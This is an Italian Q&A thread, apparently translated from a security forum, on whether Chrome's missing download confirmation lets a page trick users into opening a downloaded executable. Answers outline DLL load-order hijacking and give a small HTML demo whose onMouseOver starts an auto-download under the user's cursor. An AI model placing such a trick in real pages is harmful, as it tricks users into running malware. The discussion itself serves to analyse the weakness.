Potrebbe la mancanza di una finestra di conferma del download di Google Chrome essere una vulnerabilità di sicurezza?

Naviga le tue risposte
4

Supponiamo che l'utente stia giocando a un gioco flappy bird che richiede un tocco costante nell'area in basso a sinistra dello schermo (dove è necessario fare clic sul file scaricato).

Poi, mentre l'utente sta giocando, un file viene scaricato dal sito web e quindi l'utente fa clic su di esso perché l'utente stava giocando e apre il file.

Potrebbe essere un file EXE che potrebbe danneggiare il sistema e infettarlo con malware.

Altri browser come Firefox hanno un prompt che blocca ciò ma Chrome non lo fa e penso che sia un problema di sicurezza.

    
posta Suici Doga 28.04.2016 - 13:22
fonte

3 risposte

4

Sì, può essere una vulnerabilità di sicurezza. Per sfruttarlo, considera il seguente scenario.

  1. L'utente malintenzionato in qualche modo convince l'utente a visitare un sito Web sotto il controllo degli attaccanti.
  2. Una DLL viene scaricata automaticamente nella cartella Download.
  3. L'utente scarica un programma di installazione legittimo / setup / qualsiasi cosa nella cartella Download.
  4. È possibile che questo software sia vulnerabile a Il dirottamento degli ordini di caricamento delle DLL .
  5. Quando l'utente avvia l'app legittima, in pratica carica la DLL dannosa all'interno della cartella Download anziché quella legittima.

Fortunatamente, questo non è uno scenario molto probabile, poiché ci sono molti incogniti / se in questo attacco. L'attaccante può indovinare quali altri file legittimi vengono scaricati dall'utente? È possibile dirottare le DLL in questo software? La DLL dannosa sarà bloccata dalla scansione di download di Chrome? Ma se l'aggressore è fortunato, è persino possibile elevare i privilegi all'amministratore perché solitamente gli installatori iniziano con i privilegi di amministratore e questo prompt UAC valido viene generalmente accettato dagli utenti.

Suppongo che lo scenario proposto inizialmente sia meno probabile, poiché in genere le persone non avviano eseguibili sconosciuti dalla cartella Download. Ma alcune persone lo faranno di sicuro.

    
risposta data 28.04.2016 - 22:03
fonte
2

Non sono sicuro che questa possa essere definita una vulnerabilità ... Tuttavia, questo comportamento potrebbe essere indesiderato.

Immaginerei un possibile exploit come questo:

  • L'utente è su un sito web
  • Fai clic su un pulsante in basso a sinistra sullo schermo (fissa la posizione del pulsante in modo che non cambi mai la sua posizione sullo schermo)
  • Non appena l'utente ha il mouse sopra il pulsante (onMouseOver) avvia il download di un file eseguibile
  • Viene visualizzata la barra di download di Chrome e il file scaricato è ora in cui il pulsante era
  • Se l'utente preme il pulsante del mouse, potrebbe aprire inavvertitamente il file scaricato (se è già completamente scaricato).

Dipende dal sistema operativo se il file scaricato viene eseguito direttamente o se presenta un altro avviso all'utente.

Ho creato un breve esempio. Ciò presuppone che download.example.com avvii automaticamente un download. E se non sei molto veloce con i clic, allora funziona e hai appena aperto un file (forse dannoso). 

<html>
 <body>
  <button type="button"
    onMouseOver="window.location.assign('http://download.example.com/')"
    style="position: fixed; bottom: 1em; left: 1em;">Click Me!</button>
 </body>
</html>

IlbrowserFirefoximpediscetaliattacchididefaultaggiungendounritardosulpulsantedidownload(vediladomanda Il pulsante di salvataggio ritarda in una finestra di download di Firefox una funzionalità di sicurezza? )

    
risposta data 28.04.2016 - 23:11
fonte
0

Questo non è un problema di sicurezza in Chrome. Questo è più di un errore che un utente può fare.
Affinché il tuo "attacco" funzioni, devi seguire i seguenti passaggi:
1. Ottieni un utente per posizionare il tuo gioco
2. Scarica un file senza che l'utente se ne accorga
3. Farlo fare clic abbastanza vicino alla barra di download in basso 4. Supponiamo che abbia commesso un errore e abbia fatto clic sul file scaricato

Il probabile problema di questo accadimento in entrambi i casi è molto basso. Se succede, è al 100% l'errore degli utenti e non i cromi.

    
risposta data 28.04.2016 - 14:22
fonte

Leggi altre domande sui tag

Qual è la differenza tra la revoca della certificazione digitale e il ritiro? Azure Key Vault vs Azure Variabili d'ambiente - Qual è la strada giusta?